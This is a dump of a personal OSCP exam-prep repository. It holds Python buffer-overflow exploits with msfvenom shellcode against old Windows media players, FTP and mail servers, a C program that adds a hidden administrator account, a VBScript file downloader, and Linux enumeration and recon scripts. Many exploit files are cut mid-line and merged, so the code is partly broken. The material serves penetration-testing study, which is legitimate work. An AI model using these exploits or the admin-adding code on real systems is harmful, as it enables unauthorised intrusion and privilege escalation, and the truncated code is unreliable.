├── Documents ├── Bookmark List.pdf ├── Hunting bad characters with mona.pdf ├── Proxychains with Windows machine.pdf ├── Upgrading half shells to fully interactive TTYs.pdf └── SQL Injection Cheatsheet.md ├── Windows ├── useradd.c ├── wget.vbs └── WinPrivCheck.bat ├── BASH ├── CronJobChecker.sh ├── PortKnocker.sh ├── SUIDChecker.sh ├── Recon.sh └── LinuxPrivCheck.sh ├── README.md └── Exploits ├── ADTVPP_v1.x.py ├── CFTPS_v1.2.py ├── FCDTMP3C_v3.1.py ├── ERM2MP3C_v2.7.3.700.py ├── ATMC_v3.0.0.100.py ├── ATMC_v1.82.50.py ├── FFTPS_v1.0.py ├── SLMail_5.5.0.py ├── VulnServer.py ├── PCManFTP_2.0.7_USER.py ├── MS_v1.4.1.py ├── PCManFTP_2.0.7_GET.py ├── PCManFTP_2.0.7_PORT.py └── Brainpan_v1.0.py /Documents/Bookmark List.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Bookmark List.pdf -------------------------------------------------------------------------------- /Documents/Hunting bad characters with mona.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Hunting bad characters with mona.pdf -------------------------------------------------------------------------------- /Documents/Proxychains with Windows machine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Proxychains with Windows machine.pdf -------------------------------------------------------------------------------- /Documents/Upgrading half shells to fully interactive TTYs.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihack4falafel/OSCP/HEAD/Documents/Upgrading half shells to fully interactive TTYs.pdf -------------------------------------------------------------------------------- /Windows/useradd.c: 
-------------------------------------------------------------------------------- 1 | #include /* system, NULL, EXIT_FAILURE */ 2 | 3 | int main () 4 | { 5 | int i; 6 | i=system ("net user ihack4falafel /add && net localgroup administrators ihack4falfel /add"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /BASH/CronJobChecker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #---------------------------------------------------------------------------------# 3 | # Name = Cron Job Checker # 4 | # Author = @ihack4falafel # 5 | # Date = 12/16/2017 # 6 | # Reference = https://www.youtube.com/watch?v=K9DKULxSBK4 # 7 | # Usage = chmod +x CronJobChecker.sh && ./CronJobChecker.sh # 8 | #---------------------------------------------------------------------------------# 9 | 10 | IFS=$'\n' 11 | 12 | # Check list of running processes 13 | old_proc=$(ps -eo command) 14 | 15 | # Look for newly created processes 16 | while true; do 17 | new_proc=$(ps -eo command) 18 | diff <(echo "$old_proc") <(echo "$new_proc") | grep [\<\>] 19 | sleep 1 20 | old_proc=$new_proc 21 | done 22 | 23 | -------------------------------------------------------------------------------- /Windows/wget.vbs: -------------------------------------------------------------------------------- 1 | strUrl = WScript.Arguments.Item(0) 2 | StrFile = WScript.Arguments.Item(1) 3 | Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 4 | Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 5 | Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 6 | Const HTTPREQUEST_PROXYSETTING_PROXY = 2 7 | Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts 8 | Err.Clear 9 | Set http = Nothing 10 | Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 11 | If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 12 | If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 13 | If http Is Nothing Then Set 
http = CreateObject("Microsoft.XMLHTTP") 14 | http.Open "GET", strURL, False 15 | http.Send 16 | varByteArray = http.ResponseBody 17 | Set http = Nothing 18 | Set fs = CreateObject("Scripting.FileSystemObject") 19 | Set ts = fs.CreateTextFile(StrFile, True) 20 | strData = "" 21 | strBuffer = "" 22 | For lngCounter = 0 to UBound(varByteArray) 23 | ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) 24 | Next 25 | ts.Close 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP 2 | 3 | Hello world! This repo contain some of the scripts, exploits, and documents made during my OSCP journey. The list include but not limited to the following: 4 | 5 | ### LinuxPrivCheck.sh 6 | Yes, there are far better scripts out there, However this one has less output to go thru and it has colors. Think basic nmap scan to look for low hanging fruit followed by more complete scan. 7 | 8 | ### PortKnocker.sh 9 | Basic port knocking script with cool colors 10 | 11 | ### CronJobChecker.sh 12 | Cron job checker script that may reveal root cron jobs by checking for newly spawned processes! kudos to IppSec 13 | 14 | ### WinPrivCheck.bat 15 | Comprehensive Windows privesc script that checks KBs as well as common misconfigurations 16 | 17 | ### SQL Injection Cheatsheet 18 | No SQLMap. No problem. This cheatsheet will walk you thru how to automate things like blind SQL injection with wfuzz 19 | 20 | 21 | ------------------------------------------------------------------------------------------------------------- 22 | 23 | I'm always open to suggestions, please let me know if there is anything I can add or improve! 
24 | -------------------------------------------------------------------------------- /BASH/PortKnocker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #---------------------------------------------------------------------------------# 3 | # Name = Port Knocking Script # 4 | # Author = @ihack4falafel # 5 | # Date = 9/15/2017 # 6 | # Usage = chmod +x PortKnokcer.sh && ./PortKnocker.sh # 7 | #---------------------------------------------------------------------------------# 8 | 9 | # Check user input 10 | 11 | if ([ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ] || [ -z "$4" ]); then 12 | echo -e "\e[33m[*] Usage : \e[35m$0 \e[33m" 13 | echo -e "\e[33m[*] Example: \e[35m$0 1 2 3 192.168.199.150 \e[33m" 14 | exit 1 15 | fi 16 | 17 | # Check nmap 18 | 19 | if [ ! type nmap &> /dev/null ]; then 20 | echo "\e[31m[-]\e[34m Please install nmap and rerun the script.\e[39m" 21 | exit 0 22 | fi 23 | 24 | # Perform port knocking 25 | 26 | echo -e "\e[32m[+]\e[34m Knocking the following ports $1 $2 $3 ...\e[39m" 27 | sleep 3 28 | 29 | for port in $1 $2 $3; do nmap --host_timeout 100 --max-retries 0 -PN $4 3 -p $port; done > /dev/null 2>&1 30 | 31 | echo -e "\e[32m[+]\e[34m Checking for new open ports with nmap ...\e[39m" 32 | sleep 3 33 | 34 | nmap -sT -p- -r -n $4 --open | grep open 35 | 36 | 37 | -------------------------------------------------------------------------------- /BASH/SUIDChecker.sh: -------------------------------------------------------------------------------- 1 | echo "#------------------------------------------------#" 2 | echo "# SUID Files Enumeration Script #" 3 | echo "#------------------------------------------------#" 4 | echo " " 5 | 6 | #Find SUID files and store them in SUID_FILES.txt 7 | echo "[+] Dumping SUID files list into SUID_FILES.txt.." 
8 | find / \( -perm -4000 \) -exec ls -ld {} \; 2>/dev/null | awk '{print $9}' > SUID_FILES.txt 9 | sleep 2 10 | 11 | #loop through common linux binaries and then remove them from SUID_FILES.txt 12 | echo "[+] Trimming common SUID files from SUID_FILES.txt..." 13 | 14 | for bname in '/umount/d' '/su/d' '/mount/d' '/sudo/d' '/passwd/d' '/exim4/d' '/chfn/d' '/chsh/d' '/procmail/d' '/newgrp/d' '/ping/d' '/ntfs-3g/d' '/pppd/d' '/pkexec/d' '/ssh-keysign/d' '/dbus-daemon-launch-helper/d' '/uuidd/d' '/pt_chown/d' '/at/d' '/mtr/d' '/dmcrypt-get-device/d' '/X/d' '/traceroute6.iputils/d' '/polkit-resolve-exe-helper/d' '/polkit-set-default-helper/d' '/polkit-grant-helper-pam/d' 15 | 16 | do 17 | sed -i $bname ./SUID_FILES.txt 18 | done 19 | sleep 2 20 | 21 | echo "[+] Preform strings on the following binaries.." 22 | echo " " 23 | echo "#------------------------------------------------#" 24 | for line in $(cat SUID_FILES.txt); do 25 | echo " * "$line 26 | done 27 | echo "#------------------------------------------------#" 28 | echo " " 29 | sleep 5 30 | 31 | # Perform string command on uncommon SUID binaries 32 | for line in $(cat SUID_FILES.txt); do 33 | echo " " 34 | echo "#------------------------------------------------#" 35 | echo $line 36 | echo "#------------------------------------------------#" 37 | strings $line 38 | echo " " 39 | sleep 5 40 | done 41 | echo " " 42 | echo "#------------------------------------------------#" 43 | echo "# Done. Happy hunting! 
#" 44 | echo "#------------------------------------------------#" 45 | 46 | 47 | -------------------------------------------------------------------------------- /Exploits/ADTVPP_v1.x.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-----------------------------------------------------------------------------------# 3 | # Software = Aviosoft Digital TV Player Professional 1.x # 4 | # Download Link = http://www.aviosoft.com/download.html # 5 | # Date = 8/19/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/22932/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional | Windows 7 SP1 - Enterprise # 9 | # EIP Offset = 260 # 10 | # Badchars = "\x00\x0A\x1A" # 11 | # RET Address = 0x6034c153 | "\xFF\xE4" | [Configuration.dll] # 12 | # Usage = Aviosoft DVT Player PRO > Open > Open Playlist > Evil_Payload.PLF # 13 | #-----------------------------------------------------------------------------------# 14 | 15 | import struct 16 | 17 | print "Creating evil file.." 
18 | f=open("Evil_Payload.PLF","w") 19 | 20 | #----------------------------# 21 | # Buffer Structure # 22 | #----------------------------# 23 | # buffer = AAA...........AAA # 24 | # buffer = EIP - RET Address # 25 | # buffer = NOPSled # 26 | # buffer = payload # 27 | # buffer = BBB...........BBB # 28 | #----------------------------# 29 | 30 | #------------------------------------------------------------------------------# 31 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x1A" -f python -v payload # 32 | #------------------------------------------------------------------------------# 33 | 34 | payload = "" 35 | payload += "\xba\x2f\xeb\xc8\xf0\xd9\xd0\xd9\x74\x24\xf4\x58" 36 | payload += "\x31\xc9\xb1\x31\x31\x50\x13\x03\x50\x13\x83\xe8" 37 | payload += "\xd3\x09\x3d\x0c\xc3\x4c\xbe\xed\x13\x31\x36\x08" 38 | payload += "\x22\x71\x2c\x58\x14\x41\x26\x0c\x98\x2a\x6a\xa5" 39 | payload += "\x2b\x5e\xa3\xca\x9c\xd5\x95\xe5\x1d\x45\xe5\x64" 40 | payload += "\x9d\x94\x3a\x47\x9c\x56\x4f\x86\xd9\x8b\xa2\xda" 41 | payload += "\xb2\xc0\x11\xcb\xb7\x9d\xa9\x60\x8b\x30\xaa\x95" 42 | payload += "\x5b\x32\x9b\x0b\xd0\x6d\x3b\xad\x35\x06\x72\xb5" 43 | payload += "\x5a\x23\xcc\x4e\xa8\xdf\xcf\x86\xe1\x20\x63\xe7" 44 | payload += "\xce\xd2\x7d\x2f\xe8\x0c\x08\x59\x0b\xb0\x0b\x9e" 45 | payload += "\x76\x6e\x99\x05\xd0\xe5\x39\xe2\xe1\x2a\xdf\x61" 46 | payload += "\xed\x87\xab\x2e\xf1\x16\x7f\x45\x0d\x92\x7e\x8a" 47 | payload += "\x84\xe0\xa4\x0e\xcd\xb3\xc5\x17\xab\x12\xf9\x48" 48 | payload += "\x14\xca\x5f\x02\xb8\x1f\xd2\x49\xd6\xde\x60\xf4" 49 | payload += "\x94\xe1\x7a\xf7\x88\x89\x4b\x7c\x47\xcd\x53\x57" 50 | payload += "\x2c\x21\x1e\xfa\x04\xaa\xc7\x6e\x15\xb7\xf7\x44" 51 | payload += "\x59\xce\x7b\x6d\x21\x35\x63\x04\x24\x71\x23\xf4" 52 | payload += "\x54\xea\xc6\xfa\xcb\x0b\xc3\x98\x8a\x9f\x8f\x70" 53 | payload += "\x29\x18\x35\x8d" 54 | 55 | buffer = "A" * 260 56 | buffer += struct.pack(' New> Logging Options> More # 14 | 
#---------------------------------------------------------------------------------------------# 15 | 16 | import struct 17 | import time 18 | 19 | f=open("Evil_Payload.txt","w") 20 | 21 | #------------------------------------------------------------------------------# 22 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload # 23 | #------------------------------------------------------------------------------# 24 | 25 | payload = "" 26 | payload += "\xbb\x3e\x37\x28\xc3\xdb\xd6\xd9\x74\x24\xf4\x5a" 27 | payload += "\x31\xc9\xb1\x31\x83\xea\xfc\x31\x5a\x0f\x03\x5a" 28 | payload += "\x31\xd5\xdd\x3f\xa5\x9b\x1e\xc0\x35\xfc\x97\x25" 29 | payload += "\x04\x3c\xc3\x2e\x36\x8c\x87\x63\xba\x67\xc5\x97" 30 | payload += "\x49\x05\xc2\x98\xfa\xa0\x34\x96\xfb\x99\x05\xb9" 31 | payload += "\x7f\xe0\x59\x19\xbe\x2b\xac\x58\x87\x56\x5d\x08" 32 | payload += "\x50\x1c\xf0\xbd\xd5\x68\xc9\x36\xa5\x7d\x49\xaa" 33 | payload += "\x7d\x7f\x78\x7d\xf6\x26\x5a\x7f\xdb\x52\xd3\x67" 34 | payload += "\x38\x5e\xad\x1c\x8a\x14\x2c\xf5\xc3\xd5\x83\x38" 35 | payload += "\xec\x27\xdd\x7d\xca\xd7\xa8\x77\x29\x65\xab\x43" 36 | payload += "\x50\xb1\x3e\x50\xf2\x32\x98\xbc\x03\x96\x7f\x36" 37 | payload += "\x0f\x53\x0b\x10\x13\x62\xd8\x2a\x2f\xef\xdf\xfc" 38 | payload += "\xa6\xab\xfb\xd8\xe3\x68\x65\x78\x49\xde\x9a\x9a" 39 | payload += "\x32\xbf\x3e\xd0\xde\xd4\x32\xbb\xb4\x2b\xc0\xc1" 40 | payload += "\xfa\x2c\xda\xc9\xaa\x44\xeb\x42\x25\x12\xf4\x80" 41 | payload += "\x02\xec\xbe\x89\x22\x65\x67\x58\x77\xe8\x98\xb6" 42 | payload += "\xbb\x15\x1b\x33\x43\xe2\x03\x36\x46\xae\x83\xaa" 43 | payload += "\x3a\xbf\x61\xcd\xe9\xc0\xa3\xae\x6c\x53\x2f\x1f" 44 | payload += "\x0b\xd3\xca\x5f" 45 | 46 | #----------------------------# 47 | # Buffer Structure # 48 | #----------------------------# 49 | # buffer = AAA...........AAA # 50 | # buffer = EIP - RET Address # 51 | # buffer = NOPSled # 52 | # buffer = payload # 53 | # buffer = BBB...........BBB # 54 | 
#----------------------------# 55 | 56 | buffer = "A" * 312 57 | buffer += struct.pack(' WAV to WAV... > evil.wav # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | 18 | #--------------------------------------------------------------------------# 19 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A" -f python -v payload # 20 | #--------------------------------------------------------------------------# 21 | 22 | payload = "" 23 | payload += "\xbd\xf7\x87\xa8\x10\xda\xdd\xd9\x74\x24\xf4\x58" 24 | payload += "\x2b\xc9\xb1\x31\x31\x68\x13\x03\x68\x13\x83\xe8" 25 | payload += "\x0b\x65\x5d\xec\x1b\xe8\x9e\x0d\xdb\x8d\x17\xe8" 26 | payload += "\xea\x8d\x4c\x78\x5c\x3e\x06\x2c\x50\xb5\x4a\xc5" 27 | payload += "\xe3\xbb\x42\xea\x44\x71\xb5\xc5\x55\x2a\x85\x44" 28 | payload += "\xd5\x31\xda\xa6\xe4\xf9\x2f\xa6\x21\xe7\xc2\xfa" 29 | payload += "\xfa\x63\x70\xeb\x8f\x3e\x49\x80\xc3\xaf\xc9\x75" 30 | payload += "\x93\xce\xf8\x2b\xa8\x88\xda\xca\x7d\xa1\x52\xd5" 31 | payload += "\x62\x8c\x2d\x6e\x50\x7a\xac\xa6\xa9\x83\x03\x87" 32 | payload += "\x06\x76\x5d\xcf\xa0\x69\x28\x39\xd3\x14\x2b\xfe" 33 | payload += "\xae\xc2\xbe\xe5\x08\x80\x19\xc2\xa9\x45\xff\x81" 34 | payload += "\xa5\x22\x8b\xce\xa9\xb5\x58\x65\xd5\x3e\x5f\xaa" 35 | payload += "\x5c\x04\x44\x6e\x05\xde\xe5\x37\xe3\xb1\x1a\x27" 36 | payload += "\x4c\x6d\xbf\x23\x60\x7a\xb2\x69\xee\x7d\x40\x14" 37 | payload += "\x5c\x7d\x5a\x17\xf0\x16\x6b\x9c\x9f\x61\x74\x77" 38 | payload += "\xe4\x9e\x3e\xda\x4c\x37\xe7\x8e\xcd\x5a\x18\x65" 39 | payload += "\x11\x63\x9b\x8c\xe9\x90\x83\xe4\xec\xdd\x03\x14" 40 | payload += "\x9c\x4e\xe6\x1a\x33\x6e\x23\x79\xd2\xfc\xaf\x50" 41 | payload += "\x71\x85\x4a\xad" 42 | 43 | #----------------------------# 44 | # Buffer Structure # 45 | #----------------------------# 46 | # buffer = AAA...........AAA # 47 | # buffer = EIP - RET Address # 48 | # buffer = NOPSled # 49 | # 
buffer = payload # 50 | # buffer = BBB...........BBB # 51 | #----------------------------# 52 | 53 | buffer = "A" * 4112 54 | buffer += struct.pack(' Load > Evil_File.m3u # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | import socket 18 | 19 | #------------------------------------------------------------------------------# 20 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload # 21 | #------------------------------------------------------------------------------# 22 | 23 | payload = "" 24 | payload += "\xdd\xc6\xd9\x74\x24\xf4\x5b\xbf\xd5\xc2\x64\xc2" 25 | payload += "\x2b\xc9\xb1\x31\x83\xeb\xfc\x31\x7b\x14\x03\x7b" 26 | payload += "\xc1\x20\x91\x3e\x01\x26\x5a\xbf\xd1\x47\xd2\x5a" 27 | payload += "\xe0\x47\x80\x2f\x52\x78\xc2\x62\x5e\xf3\x86\x96" 28 | payload += "\xd5\x71\x0f\x98\x5e\x3f\x69\x97\x5f\x6c\x49\xb6" 29 | payload += "\xe3\x6f\x9e\x18\xda\xbf\xd3\x59\x1b\xdd\x1e\x0b" 30 | payload += "\xf4\xa9\x8d\xbc\x71\xe7\x0d\x36\xc9\xe9\x15\xab" 31 | payload += "\x99\x08\x37\x7a\x92\x52\x97\x7c\x77\xef\x9e\x66" 32 | payload += "\x94\xca\x69\x1c\x6e\xa0\x6b\xf4\xbf\x49\xc7\x39" 33 | payload += "\x70\xb8\x19\x7d\xb6\x23\x6c\x77\xc5\xde\x77\x4c" 34 | payload += "\xb4\x04\xfd\x57\x1e\xce\xa5\xb3\x9f\x03\x33\x37" 35 | payload += "\x93\xe8\x37\x1f\xb7\xef\x94\x2b\xc3\x64\x1b\xfc" 36 | payload += "\x42\x3e\x38\xd8\x0f\xe4\x21\x79\xf5\x4b\x5d\x99" 37 | payload += "\x56\x33\xfb\xd1\x7a\x20\x76\xb8\x10\xb7\x04\xc6" 38 | payload += "\x56\xb7\x16\xc9\xc6\xd0\x27\x42\x89\xa7\xb7\x81" 39 | payload += "\xee\x58\xf2\x88\x46\xf1\x5b\x59\xdb\x9c\x5b\xb7" 40 | payload += "\x1f\x99\xdf\x32\xdf\x5e\xff\x36\xda\x1b\x47\xaa" 41 | payload += "\x96\x34\x22\xcc\x05\x34\x67\xaf\xc8\xa6\xeb\x1e" 42 | payload += "\x6f\x4f\x89\x5e" 43 | 44 | #----------------------------# 45 | # Buffer Structure # 46 | #----------------------------# 47 | # buffer = 
AAA...........AAA # 48 | # buffer = EIP - RET Address # 49 | # buffer = NOPSled # 50 | # buffer = payload # 51 | # buffer = BBB...........BBB # 52 | #----------------------------# 53 | 54 | buffer = "A" * 26064 55 | buffer += struct.pack(' # 7 | #---------------------------------------------------------------------------------# 8 | 9 | 10 | 11 | # check for IP argument 12 | 13 | if [ -z "$1" ]; then 14 | echo -e "\e[35m[*] Usage: \e[36m$0 " 15 | echo -e "\e[39m" 16 | exit 1 17 | fi 18 | 19 | # check if packages are installed 20 | 21 | if [ ! type nmap &> /dev/null ]; then 22 | echo " " 23 | echo "Please install nmap and rerun the script." 24 | echo " " 25 | exit 0 26 | fi 27 | 28 | if [ ! type nikto &> /dev/null ]; then 29 | echo " " 30 | echo "Please install nikto and rerun the script." 31 | echo " " 32 | exit 0 33 | fi 34 | 35 | if [ ! type dirb &> /dev/null ]; then 36 | echo " " 37 | echo "Please install dirb and rerun the script." 38 | echo " " 39 | exit 0 40 | fi 41 | 42 | if [ ! locate enum4linux &> /dev/null ]; then 43 | echo " " 44 | echo "Please install enum4linux and rerun the script." 
45 | echo " " 46 | exit 0 47 | fi 48 | 49 | # go ahead and start scanning 50 | 51 | echo " " 52 | echo -e "\e[35m#----------------------------------#" 53 | echo -e "\e[35m# \e[36m TCP Scan \e[35m #" 54 | echo -e "\e[35m#----------------------------------#" 55 | echo " " 56 | echo -e "\e[39m" 57 | 58 | nmap -Pn -p- -A $1 -r -n --open 59 | 60 | echo " " 61 | echo -e "\e[35m#----------------------------------#" 62 | echo -e "\e[35m# \e[36m Nikto Scan \e[35m #" 63 | echo -e "\e[35m#----------------------------------#" 64 | echo " " 65 | echo -e "\e[39m" 66 | 67 | nikto -h http://$1/ 68 | 69 | echo " " 70 | 71 | nikto -h https://$1/ 72 | 73 | echo " " 74 | echo -e "\e[35m#----------------------------------#" 75 | echo -e "\e[35m# \e[36m Dirb Scan \e[35m #" 76 | echo -e "\e[35m#----------------------------------#" 77 | echo " " 78 | echo -e "\e[39m" 79 | 80 | dirb http://$1/ /usr/share/wordlists/dirb/big.txt 81 | 82 | echo " " 83 | 84 | dirb https://$1/ /usr/share/wordlists/dirb/big.txt 85 | 86 | echo " " 87 | echo -e "\e[35m#----------------------------------#" 88 | echo -e "\e[35m# \e[36m Enum4linux \e[35m #" 89 | echo -e "\e[35m#----------------------------------#" 90 | echo " " 91 | echo -e "\e[39m" 92 | 93 | enum4linux $1 94 | 95 | echo " " 96 | echo -e "\e[35m#----------------------------------#" 97 | echo -e "\e[35m# \e[36m Happy Hunting! 
\e[35m #" 98 | echo -e "\e[35m#----------------------------------#" 99 | echo " " 100 | echo -e "\e[39m" 101 | 102 | -------------------------------------------------------------------------------- /Exploits/ATMC_v3.0.0.100.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-------------------------------------------------------------------------------------------------------------# 3 | # Software = ASX to MP3 Converter Version 3.0.0.100 # 4 | # Download Link = https://www.exploit-db.com/apps/b31a84e79d9941d89336b6708ef52a20-ASXtoMP3Converter_3121.exe # 5 | # Date = 10/11/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/11930/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # Windows 7 SP1 - Enterprise # 10 | # Windows 8.1 - Enterprise # 11 | # Windows 10 (64-bit) - Enterprise # # 12 | # EIP Offset = 17417 # 13 | # Badchars = "\x00\x09\x0a" # 14 | # RET Address = 0x1005dacf | "\xFF\xE4" | [MSA2Mfilter03.dll] # 15 | # Usage = ASX to MP3 Converter > load > Evil_Payload.asx # 16 | #-------------------------------------------------------------------------------------------------------------# 17 | 18 | import struct 19 | import time 20 | 21 | #------------------------------------------------------------------------------# 22 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a" -f python -v payload # 23 | #------------------------------------------------------------------------------# 24 | 25 | payload = "" 26 | payload += "\xdb\xdf\xd9\x74\x24\xf4\x5b\xbd\x9e\x16\x2c\x45" 27 | payload += "\x33\xc9\xb1\x31\x31\x6b\x18\x03\x6b\x18\x83\xc3" 28 | payload += "\x9a\xf4\xd9\xb9\x4a\x7a\x21\x42\x8a\x1b\xab\xa7" 29 | payload += "\xbb\x1b\xcf\xac\xeb\xab\x9b\xe1\x07\x47\xc9\x11" 30 | payload += "\x9c\x25\xc6\x16\x15\x83\x30\x18\xa6\xb8\x01\x3b" 31 | payload += "\x24\xc3\x55\x9b\x15\x0c\xa8\xda\x52\x71\x41\x8e" 32 | payload += 
"\x0b\xfd\xf4\x3f\x38\x4b\xc5\xb4\x72\x5d\x4d\x28" 33 | payload += "\xc2\x5c\x7c\xff\x59\x07\x5e\x01\x8e\x33\xd7\x19" 34 | payload += "\xd3\x7e\xa1\x92\x27\xf4\x30\x73\x76\xf5\x9f\xba" 35 | payload += "\xb7\x04\xe1\xfb\x7f\xf7\x94\xf5\x7c\x8a\xae\xc1" 36 | payload += "\xff\x50\x3a\xd2\xa7\x13\x9c\x3e\x56\xf7\x7b\xb4" 37 | payload += "\x54\xbc\x08\x92\x78\x43\xdc\xa8\x84\xc8\xe3\x7e" 38 | payload += "\x0d\x8a\xc7\x5a\x56\x48\x69\xfa\x32\x3f\x96\x1c" 39 | payload += "\x9d\xe0\x32\x56\x33\xf4\x4e\x35\x59\x0b\xdc\x43" 40 | payload += "\x2f\x0b\xde\x4b\x1f\x64\xef\xc0\xf0\xf3\xf0\x02" 41 | payload += "\xb5\x0c\xbb\x0f\x9f\x84\x62\xda\xa2\xc8\x94\x30" 42 | payload += "\xe0\xf4\x16\xb1\x98\x02\x06\xb0\x9d\x4f\x80\x28" 43 | payload += "\xef\xc0\x65\x4f\x5c\xe0\xaf\x2c\x03\x72\x33\x9d" 44 | payload += "\xa6\xf2\xd6\xe1" 45 | 46 | #----------------------------# 47 | # Buffer Structure # 48 | #----------------------------# 49 | # buffer = "http://" # 50 | # buffer = AAA...........AAA # 51 | # buffer = EIP - RET Address # 52 | # buffer = NOPSled # 53 | # buffer = payload # 54 | # buffer = BBB...........BBB # 55 | #----------------------------# 56 | 57 | buffer = "http://" 58 | buffer += "A" * 17417 59 | buffer += struct.pack(' load > Evil_Payload.asx # 13 | #---------------------------------------------------------------------------------------------------------# 14 | 15 | import struct 16 | import time 17 | import sys 18 | 19 | #----------------------------------------------------------------------------------# 20 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f python -v payload # 21 | #----------------------------------------------------------------------------------# 22 | 23 | payload = "" 24 | payload += "\xdb\xdb\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x31\xbd" 25 | payload += "\xb0\x10\x19\xb2\x31\x6a\x18\x83\xea\xfc\x03\x6a" 26 | payload += "\xa4\xf2\xec\x4e\x2c\x70\x0e\xaf\xac\x15\x86\x4a" 27 | payload += "\x9d\x15\xfc\x1f\x8d\xa5\x76\x4d\x21\x4d\xda\x66" 28 
| payload += "\xb2\x23\xf3\x89\x73\x89\x25\xa7\x84\xa2\x16\xa6" 29 | payload += "\x06\xb9\x4a\x08\x37\x72\x9f\x49\x70\x6f\x52\x1b" 30 | payload += "\x29\xfb\xc1\x8c\x5e\xb1\xd9\x27\x2c\x57\x5a\xdb" 31 | payload += "\xe4\x56\x4b\x4a\x7f\x01\x4b\x6c\xac\x39\xc2\x76" 32 | payload += "\xb1\x04\x9c\x0d\x01\xf2\x1f\xc4\x58\xfb\x8c\x29" 33 | payload += "\x55\x0e\xcc\x6e\x51\xf1\xbb\x86\xa2\x8c\xbb\x5c" 34 | payload += "\xd9\x4a\x49\x47\x79\x18\xe9\xa3\x78\xcd\x6c\x27" 35 | payload += "\x76\xba\xfb\x6f\x9a\x3d\x2f\x04\xa6\xb6\xce\xcb" 36 | payload += "\x2f\x8c\xf4\xcf\x74\x56\x94\x56\xd0\x39\xa9\x89" 37 | payload += "\xbb\xe6\x0f\xc1\x51\xf2\x3d\x88\x3f\x05\xb3\xb6" 38 | payload += "\x0d\x05\xcb\xb8\x21\x6e\xfa\x33\xae\xe9\x03\x96" 39 | payload += "\x8b\x06\x4e\xbb\xbd\x8e\x17\x29\xfc\xd2\xa7\x87" 40 | payload += "\xc2\xea\x2b\x22\xba\x08\x33\x47\xbf\x55\xf3\xbb" 41 | payload += "\xcd\xc6\x96\xbb\x62\xe6\xb2\xdf\xe5\x74\x5e\x0e" 42 | payload += "\x80\xfc\xc5\x4e" 43 | 44 | #----------------------------# 45 | # Buffer Structure # 46 | #----------------------------# 47 | # buffer = AAA...........AAA # 48 | # buffer = EIP - RET Address # 49 | # buffer = NOPSled # 50 | # buffer = payload # 51 | # buffer = BBB...........BBB # 52 | #----------------------------# 53 | 54 | buffer = "A" * 233 55 | buffer += struct.pack(' # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | #---------------------------------------------------------------------------------------------# 16 | # List of Vuln. 
Commands = [DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT] # 17 | #---------------------------------------------------------------------------------------------# 18 | 19 | import sys 20 | import socket 21 | import struct 22 | import time 23 | 24 | 25 | if len(sys.argv) < 2: 26 | print "Usage : python exploit.py " 27 | print "Example : python exploit.py 127.0.0.1" 28 | sys.exit(0) 29 | 30 | HOST = sys.argv[1] 31 | 32 | #------------------------------------------------------------------------------# 33 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0A\x0D" -f python -v payload # 34 | #------------------------------------------------------------------------------# 35 | 36 | payload = "" 37 | payload += "\xbd\x71\xa7\xd9\x36\xdd\xc7\xd9\x74\x24\xf4\x5a" 38 | payload += "\x31\xc9\xb1\x31\x31\x6a\x13\x83\xc2\x04\x03\x6a" 39 | payload += "\x7e\x45\x2c\xca\x68\x0b\xcf\x33\x68\x6c\x59\xd6" 40 | payload += "\x59\xac\x3d\x92\xc9\x1c\x35\xf6\xe5\xd7\x1b\xe3" 41 | payload += "\x7e\x95\xb3\x04\x37\x10\xe2\x2b\xc8\x09\xd6\x2a" 42 | payload += "\x4a\x50\x0b\x8d\x73\x9b\x5e\xcc\xb4\xc6\x93\x9c" 43 | payload += "\x6d\x8c\x06\x31\x1a\xd8\x9a\xba\x50\xcc\x9a\x5f" 44 | payload += "\x20\xef\x8b\xf1\x3b\xb6\x0b\xf3\xe8\xc2\x05\xeb" 45 | payload += "\xed\xef\xdc\x80\xc5\x84\xde\x40\x14\x64\x4c\xad" 46 | payload += "\x99\x97\x8c\xe9\x1d\x48\xfb\x03\x5e\xf5\xfc\xd7" 47 | payload += "\x1d\x21\x88\xc3\x85\xa2\x2a\x28\x34\x66\xac\xbb" 48 | payload += "\x3a\xc3\xba\xe4\x5e\xd2\x6f\x9f\x5a\x5f\x8e\x70" 49 | payload += 